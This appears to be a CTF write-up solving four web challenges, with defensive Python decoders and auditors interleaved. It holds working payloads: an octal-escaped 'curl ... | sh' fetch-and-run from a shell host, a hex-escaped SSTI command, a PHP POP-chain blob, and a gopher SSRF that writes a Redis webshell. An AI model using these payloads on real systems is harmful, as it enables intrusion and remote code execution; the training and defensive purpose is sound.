PPSUC_CTF_wp
Last edited 2022-5-1
type: Post
status: Published
date: May 1, 2022
summary: PPSUC freshman competition writeup
tags: CTF, CTF_Wp
category: Study and reflection

Web

ezphp

LINECTF2022wp
It apparently wasn't too much of a grind, so this one can be called a wp. I watched tkmk (the god) cranking out solves the whole time while I did odd jobs and learned on the side. All four of the easier challenges got solved; I wasn't in the mood to look at the ones with only one or two solves. In the end I'm still trash who can only do the easy ones.

Another challenge based on p神's article. This time bash is given directly, but letters are not allowed. It is still the same command execution. putenv without an equals sign means unsetting that variable, though since the variable is gone anyway once the request finishes, there doesn't seem to be much need for extra handling.

With letters banned, the first instinct is octal, but in practice I hammered on it for a long time without getting through... I tried octal both locally and remotely without success, while tkmk said the $'\000' form worked for him on the first try. I was in the dark for a while, then shamelessly went and asked. The payload is roughly this pattern, and he said it can be found in the man page. Let me try.

I found out why I thought it didn't work back then... When testing locally I used PHP's getenv function to fetch the environment variable's value, which is not interpreted, so I assumed it wasn't being interpreted at all. In fact, fetching it with system directly shows that it is interpreted; there is also no output, so you have to touch a file or similar to confirm the hit...

BASH_ENV works directly; BASH_FUNC got no reaction after a long time. I also found something odd: echoing a bare octal escape like \000 also gets turned into the string, but only the $'\000' form, wrapped in $ and quotes, is correctly parsed to execute commands. This syntax is easier to find by searching for oct in the man page:

Words of the form $'string' are treated specially. The word expands to string, with backslash-escaped characters replaced as specified by the ANSI C standard.
Octal bypass for command execution, reverse shell
<?php
error_reporting(0);

function bye($s, $ptn){
    if(preg_match($ptn, $s)){
        return false;
    }
    return true;
}

foreach($_GET["env"] as $k=>$v){
    if(bye($k, "/=/i") && bye($v, "/[a-zA-Z]/i")) {
        putenv("{$k}={$v}");
    }
}

system("bash -c 'imdude'");

foreach($_GET["env"] as $k=>$v){
    if(bye($k, "/=/i")) {
        putenv("{$k}");
    }
}

highlight_file(__FILE__);
?>
import re

payload = "curl https://your-shell.com/42.193.100.225:4444 | sh"
result = ""
for c in payload:
    if re.match("[a-zA-Z]", c):
        # replace each letter with a bash ANSI-C quoted octal escape, e.g. c -> $'\143'
        result += "$'\\" + str(oct(ord(c)))[2:].rjust(3, '0') + "'"
    else:
        result += c
# wrap in $( ) so bash runs it when it expands the environment variable
print("$(" + result + ")")
 

Flask_ssti

Running the encrypted ciphertext shows that there is a template injection.
One-shot payload
{{(cxh|attr("\x5f\x5f\x69\x6e\x69\x74\x5f\x5f")|attr("\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f")|attr("\x67\x65\x74")("\x5f\x5f\x62\x75\x69\x6c\x74\x69\x6e\x73\x5f\x5f")|attr("\x67\x65\x74")("\x65\x76\x61\x6c")("\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x22\x6f\x73\x22\x29\x2e\x70\x6f\x70\x65\x6e\x28\x22\x63\x61\x74\x20\x2f\x66\x6c\x61\x67\x22\x29\x2e\x72\x65\x61\x64\x28\x29"))}}
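The ezphp payload above hides its letters inside bash `$'\ooo'` words, and this SSTI payload hides its identifiers inside `\xHH` escapes; in both cases a character blacklist inspects the escaped form while bash or Jinja evaluates the decoded one. The following Python is an added example (not code from the original writeup) that undoes both escape forms so a reviewer, WAF rule or log pipeline can see what a request really expands to. The `env[NAME]=VALUE` parameter shape follows the ezphp source; the sample query string is constructed here, the `BASH_FUNC_` prefix check is my assumption based on bash's exported-function naming, and all function names are my own.

```python
import re
from urllib.parse import parse_qsl

# Backslash escapes understood by both bash $'...' words and Python/Jinja
# string literals: \xHH (two hex digits) and \ooo (one to three octal digits).
ESCAPE_RE = re.compile(r"\\(?:x([0-9A-Fa-f]{2})|([0-7]{1,3}))")
# A bash ANSI-C quoted word: $'...' with backslash escapes inside.
ANSI_C_WORD_RE = re.compile(r"\$'((?:\\.|[^'\\])*)'")
LETTER_RE = re.compile(r"[a-zA-Z]")
ENV_PARAM_RE = re.compile(r"env\[(.*)\]")


def decode_backslash_escapes(text: str) -> str:
    """Replace \\xHH and \\ooo escapes with the characters they denote."""
    def repl(match: re.Match) -> str:
        hex_digits, oct_digits = match.groups()
        if hex_digits is not None:
            return chr(int(hex_digits, 16))
        return chr(int(oct_digits, 8))
    return ESCAPE_RE.sub(repl, text)


def expand_ansi_c_words(text: str) -> str:
    """Expand every $'...' word the way bash does before running the command."""
    return ANSI_C_WORD_RE.sub(lambda m: decode_backslash_escapes(m.group(1)), text)


def inspect_env_params(query_string: str) -> list:
    """Look at env[NAME]=VALUE parameters the way the ezphp script consumes them.

    For each parameter report the expanded value, whether the raw value hides
    letters from a [a-zA-Z] blacklist, and whether NAME is one of the bash
    hooks (BASH_ENV, BASH_FUNC_*) that make environment content executable.
    """
    findings = []
    for key, raw_value in parse_qsl(query_string, keep_blank_values=True):
        match = ENV_PARAM_RE.fullmatch(key)
        if match is None:
            continue
        name = match.group(1)
        decoded = expand_ansi_c_words(raw_value)
        findings.append({
            "name": name,
            "raw": raw_value,
            "decoded": decoded,
            # letters absent from the raw value but present after expansion
            "hides_letters": (LETTER_RE.search(raw_value) is None
                              and LETTER_RE.search(decoded) is not None),
            "bash_hook": name == "BASH_ENV" or name.startswith("BASH_FUNC_"),
        })
    return findings


# Constructed sample: the ezphp encoder's output for "touch /tmp/1" placed in
# BASH_ENV, plus an ordinary parameter for contrast (%20 is the space).
SAMPLE_QUERY = (
    r"env[BASH_ENV]=$($'\164'$'\157'$'\165'$'\143'$'\150'%20"
    r"/$'\164'$'\155'$'\160'/1)&env[TZ]=UTC"
)

# The identifier hidden in the SSTI payload's first attr() call.
SAMPLE_SSTI_ATTR = r"\x5f\x5f\x69\x6e\x69\x74\x5f\x5f"

if __name__ == "__main__":
    for finding in inspect_env_params(SAMPLE_QUERY):
        print(finding)
    print(decode_backslash_escapes(SAMPLE_SSTI_ATTR))
```

The useful signal for detection is not the octal itself but the combination in a finding: a value with no letters that expands to a value with letters, stored under a variable name bash treats as executable.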

Final web

# Throwing an exception stops the script from ending normally, so __destruct is not called on the way out
if (isset($_GET["ppsuc"])) {
    $a=unserialize($_GET['ppsuc']);
    throw new Exception("高一新生报道");
} else {
    highlight_file(__FILE__);
}
Deserialization payload
<?php
error_reporting(0);

class one {
    public $object;
    public $year_parm=array(0=>"Happy_func");

    public function MeMeMe() {
        $a = new $this->object('./');
        foreach($a as $f) {
            echo $f."\n";
        }
        // array_walk($this, function($fn, $prev){
        //     if ($fn[0] === "Happy_func" && $prev === "year_parm") {
        //         $a = new $this->object ('./');
        //         foreach ($a as $f){
        //             echo $f."\n";
        //         }
        //     }
        // });
    }

    public function __destruct() {
        @$this->object->add();
    }

    public function __toString() {
        return $this->object->string;
    }

    public function __construct($str) {
        $this->object = $str;
    }
}

class second {
    public $filename;

    protected function addMe() {
        return "Wow you have sovled".$this->filename;
    }

    public function __call($func, $args) {
        call_user_func([$this, $func."Me"], $args);
    }
}

class third {
    private $string;

    public function __construct($string) {
        $this->string = $string;
    }

    public function __get($name) {
        $var = $this->$name;
        $var[$name]();
    }
}

$a = new one(new second());
# The built-in PHP class DirectoryIterator echoes the files in the directory
$a->object->filename = new one(new third(array('string'=>array(new one('DirectoryIterator'),'MeMeME'))));
$n = null;
echo urlencode(serialize( array($a,$n)));

# Output
# a:2:{i:0;O:3:"one":2:{s:6:"object";O:6:"second":1:{s:8:"filename";O:3:"one":2:{s:6:"object";O:5:"third":1:{s:13:"thirdstring";a:1:{s:6:"string";a:2:{i:0;O:3:"one":2:{s:6:"object";s:17:"DirectoryIterator";s:9:"year_parm";a:1:{i:0;s:10:"Happy_func";}}i:1;s:6:"MeMeME";}}}s:9:"year_parm";a:1:{i:0;s:10:"Happy_func";}}}s:9:"year_parm";a:1:{i:0;s:10:"Happy_func";}}i:1;N;}

# Modified
# a:2:{i:0;O:3:"one":2:{s:6:"object";O:6:"second":1:{s:8:"filename";O:3:"one":2:{s:6:"object";O:5:"third":1:{s:13:"thirdstring";a:1:{s:6:"string";a:2:{i:0;O:3:"one":2:{s:6:"object";s:17:"DirectoryIterator";s:9:"year_parm";a:1:{i:0;s:10:"Happy_func";}}i:1;s:6:"MeMeME";}}}s:9:"year_parm";a:1:{i:0;s:10:"Happy_func";}}}s:9:"year_parm";a:1:{i:0;s:10:"Happy_func";}}i:0;N;}

# URL-encoded
# a%3A2%3A%7Bi%3A0%3BO%3A3%3A%22one%22%3A2%3A%7Bs%3A6%3A%22object%22%3BO%3A6%3A%22second%22%3A1%3A%7Bs%3A8%3A%22filename%22%3BO%3A3%3A%22one%22%3A2%3A%7Bs%3A6%3A%22object%22%3BO%3A5%3A%22third%22%3A1%3A%7Bs%3A13%3A%22%00third%00string%22%3Ba%3A1%3A%7Bs%3A6%3A%22string%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A3%3A%22one%22%3A2%3A%7Bs%3A6%3A%22object%22%3Bs%3A17%3A%22DirectoryIterator%22%3Bs%3A9%3A%22year_parm%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A10%3A%22Happy_func%22%3B%7D%7Di%3A1%3Bs%3A6%3A%22MeMeME%22%3B%7D%7D%7Ds%3A9%3A%22year_parm%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A10%3A%22Happy_func%22%3B%7D%7D%7Ds%3A9%3A%22year_parm%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A10%3A%22Happy_func%22%3B%7D%7Di%3A0%3BN%3B%7D

# Changing the array index after serialization makes unserialize reassign the first object's slot, which triggers the __destruct magic method
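The last step above works because the modified blob assigns outer-array key 0 twice: when unserialize stores the second value, the first `one` object loses its last reference and its __destruct fires immediately, before the script reaches the throw. A defender reviewing such input wants to see exactly that (which classes a blob instantiates, and whether any array key repeats) without calling unserialize at all. The Python below is an added example, not the challenge's code: a small parser for PHP's serialize() format that reports the classes referenced, duplicate array keys, and the visibility encoded in mangled property names (the `\0third\0string` that shows up as `thirdstring` in the echoed output, since the null bytes do not print). The sample blob is constructed here from the writeup's chain and shortened; function and class names are my own.

```python
from dataclasses import dataclass
from typing import Any, List, Tuple


@dataclass
class PhpArray:
    items: List[Tuple[Any, Any]]   # ordered (key, value) pairs; duplicates kept


@dataclass
class PhpObject:
    class_name: str
    props: List[Tuple[str, Any]]   # (mangled property name, value)


def php_unserialize(blob: str) -> Any:
    """Parse a PHP serialize() string into Python values without instantiating anything."""
    value, end = _parse(blob, 0)
    if end != len(blob):
        raise ValueError(f"trailing data at offset {end}")
    return value


def _parse(d: str, pos: int) -> Tuple[Any, int]:
    tag = d[pos]
    if tag == "N":                                     # N;
        return None, pos + 2
    if tag in "ibd":                                   # i:42;  b:1;  d:1.5;
        end = d.index(";", pos)
        raw = d[pos + 2:end]
        value = {"i": int, "d": float, "b": lambda s: s == "1"}[tag](raw)
        return value, end + 1
    if tag == "s":                                     # s:LEN:"BYTES";
        colon = d.index(":", pos + 2)
        length = int(d[pos + 2:colon])
        start = colon + 2                              # skip :"
        return d[start:start + length], start + length + 2   # skip ";
    if tag == "a":                                     # a:COUNT:{KEY;VALUE;...}
        colon = d.index(":", pos + 2)
        count = int(d[pos + 2:colon])
        pos = colon + 2                                # skip :{
        items = []
        for _ in range(count):
            key, pos = _parse(d, pos)
            val, pos = _parse(d, pos)
            items.append((key, val))
        return PhpArray(items), pos + 1                # skip }
    if tag == "O":                                     # O:LEN:"CLASS":COUNT:{...}
        colon = d.index(":", pos + 2)
        name_len = int(d[pos + 2:colon])
        name = d[colon + 2:colon + 2 + name_len]
        pos = colon + 2 + name_len + 2                 # skip ":
        colon = d.index(":", pos)
        count = int(d[pos:colon])
        pos = colon + 2                                # skip :{
        props = []
        for _ in range(count):
            pname, pos = _parse(d, pos)
            pval, pos = _parse(d, pos)
            props.append((pname, pval))
        return PhpObject(name, props), pos + 1
    raise ValueError(f"unsupported tag {tag!r} at offset {pos}")


def property_visibility(raw_name: str) -> Tuple[str, str]:
    """Undo PHP's name mangling: \\0*\\0name is protected, \\0Class\\0name is private."""
    if raw_name.startswith("\x00*\x00"):
        return "protected", raw_name[3:]
    if raw_name.startswith("\x00"):
        _, owner, name = raw_name.split("\x00", 2)
        return f"private({owner})", name
    return "public", raw_name


def audit_blob(blob: str, allowed_classes=()) -> dict:
    """Summarise what a blob would instantiate and flag duplicate array keys."""
    classes, duplicate_keys, props = [], [], []

    def walk(node):
        if isinstance(node, PhpArray):
            seen = set()
            for key, val in node.items:
                # PHP folds decimal-integer string keys into integer keys
                if isinstance(key, str) and key.lstrip("-").isdigit():
                    key = int(key)
                if key in seen:
                    duplicate_keys.append(key)
                seen.add(key)
                walk(val)
        elif isinstance(node, PhpObject):
            classes.append(node.class_name)
            for pname, pval in node.props:
                props.append((node.class_name,) + property_visibility(pname))
                walk(pval)

    walk(php_unserialize(blob))
    return {
        "classes": classes,
        "unexpected_classes": sorted({c for c in classes if c not in allowed_classes}),
        "duplicate_keys": duplicate_keys,
        "properties": props,
    }


# Constructed sample: a shortened version of the writeup's modified blob, with
# the duplicate outer key 0 and third's private "string" property.
SAMPLE_BLOB = (
    'a:2:{i:0;O:3:"one":1:{s:6:"object";O:5:"third":1:{s:13:"\x00third\x00string";'
    'a:1:{s:6:"string";s:17:"DirectoryIterator";}}}i:0;N;}'
)

if __name__ == "__main__":
    print(audit_blob(SAMPLE_BLOB, allowed_classes=("one",)))
```

Two of the report's fields map directly to mitigations: `unexpected_classes` is what an `allowed_classes` option on unserialize() would have rejected, and a non-empty `duplicate_keys` list is a blob no serializer produces on its own.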
# Found testhook.php
<?php
// create curl resource
$ch = curl_init();
if(isset($_POST["handler"])){
    // set url
    curl_setopt($ch, CURLOPT_URL, $_POST["handler"]);
    //return the transfer as a string
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    // $output contains the output string
    $output = curl_exec($ch);
    // close curl resource to free up system resources
    curl_close($ch);
    echo $output;
} else{
    highlight_file(__FILE__);
    die("test your website");
}
?>
Use a pseudo-protocol (URL wrapper) to look at the database information
Read the apt install log with the file:// protocol
handler=file:///var/log/apt/history.log
It turns out the database is Redis
 
Use the SSRF vulnerability to make Redis write a webshell
Writing the shell through SSRF with the gophers tool
This part is the Redis shell-writing command; it has to be URL-encoded a second time
gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2434%0D%0A%0A%0A%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

# Only URL-encode the highlighted region (everything after the gopher item type "_")
gopher://127.0.0.1:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252434%250D%250A%250A%250A%253C%253Fphp%2520system%2528%2524_GET%255B%2527cmd%2527%255D%2529%253B%2520%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A%0D%0A%0A

# payload:
handler=gopher://127.0.0.1:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252434%250D%250A%250A%250A%253C%253Fphp%2520system%2528%2524_GET%255B%2527cmd%2527%255D%2529%253B%2520%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

# The Redis commands after decoding
handler=gopher://127.0.0.1:6379/_*1
$8
flushall
*3
$3
set
$1
1
$34
<?php system($_GET['cmd']); ?>
*4
$6
config
$3
set
$3
dir
$13
/var/www/html
*4
$6
config
$3
set
$10
dbfilename
$9
shell.php
*1
$4
save
Once the shell is written, it can be used.
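Reviewing a `gopher://` handler value by eye, as the decoded listing above does, is error-prone because the selector is percent-encoded once per hop. The Python below is an added example of mine, not part of the writeup: it percent-decodes the gopher selector the way a client would before sending it, parses the RESP framing back into command argument lists, and flags the `CONFIG SET dir` / `CONFIG SET dbfilename` / `SAVE` sequence that turns the RDB dump into an arbitrary file write. The sample handler value is the writeup's single-encoded payload (what the PHP script sees after form decoding), re-split per command for readability; the one-character item-type handling and the function names are my assumptions.

```python
from typing import List
from urllib.parse import unquote_to_bytes, urlsplit


def gopher_selector_bytes(handler_url: str) -> bytes:
    """Return the raw bytes a gopher client would send for this URL.

    The path is '/<item-type><selector>'; the one-character item type ('_' in
    the writeup) is dropped and the selector is percent-decoded once.
    """
    parts = urlsplit(handler_url)
    if parts.scheme != "gopher":
        raise ValueError("not a gopher URL")
    selector = parts.path.lstrip("/")[1:]
    return unquote_to_bytes(selector)


def parse_resp_commands(data: bytes) -> List[List[str]]:
    """Split a RESP stream of arrays of bulk strings into argv lists."""
    commands, pos = [], 0
    while pos < len(data):
        if data[pos:pos + 1] in (b"\r", b"\n"):          # tolerate stray line breaks
            pos += 1
            continue
        if data[pos:pos + 1] != b"*":
            raise ValueError(f"expected array header at offset {pos}")
        end = data.index(b"\r\n", pos)
        argc = int(data[pos + 1:end])
        pos = end + 2
        argv = []
        for _ in range(argc):
            if data[pos:pos + 1] != b"$":
                raise ValueError(f"expected bulk string at offset {pos}")
            end = data.index(b"\r\n", pos)
            length = int(data[pos + 1:end])
            pos = end + 2
            argv.append(data[pos:pos + length].decode("latin-1"))
            pos += length + 2                              # payload plus its CRLF
        commands.append(argv)
    return commands


def rdb_write_indicators(commands: List[List[str]]) -> dict:
    """Flag CONFIG SET dir/dbfilename followed by SAVE, and script-looking values."""
    dump_dir = dump_name = None
    saved = script_like = False
    for argv in commands:
        lowered = [a.lower() for a in argv]
        if lowered[:3] == ["config", "set", "dir"] and len(argv) == 4:
            dump_dir = argv[3]
        elif lowered[:3] == ["config", "set", "dbfilename"] and len(argv) == 4:
            dump_name = argv[3]
        elif lowered[:1] in (["save"], ["bgsave"]):
            saved = True
        elif lowered[:1] == ["set"] and len(argv) == 3 and "<?php" in argv[2]:
            script_like = True
    return {
        "dir": dump_dir,
        "dbfilename": dump_name,
        "save": saved,
        "unexpected_rdb_name": dump_name is not None and not dump_name.endswith(".rdb"),
        "script_like_value": script_like,
        "file_write_chain": saved and dump_dir is not None and dump_name is not None,
    }


# The writeup's handler value as the PHP script receives it (one layer of
# percent-encoding removed by form decoding), split here per RESP command.
SAMPLE_HANDLER = (
    "gopher://127.0.0.1:6379/_"
    "%2A1%0D%0A%248%0D%0Aflushall%0D%0A"
    "%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2434%0D%0A"
    "%0A%0A%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E%0A%0A%0D%0A"
    "%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A"
    "%2413%0D%0A/var/www/html%0D%0A"
    "%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A"
    "%249%0D%0Ashell.php%0D%0A"
    "%2A1%0D%0A%244%0D%0Asave%0D%0A"
)

if __name__ == "__main__":
    cmds = parse_resp_commands(gopher_selector_bytes(SAMPLE_HANDLER))
    for argv in cmds:
        print(argv)
    print(rdb_write_indicators(cmds))
```

On the Redis side the same chain is what `rename-command CONFIG ""` and binding to a non-loopback-reachable interface are meant to stop; on the application side, the fetcher should restrict `CURLOPT_PROTOCOLS` to http/https rather than accepting whatever scheme the `handler` parameter carries.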
 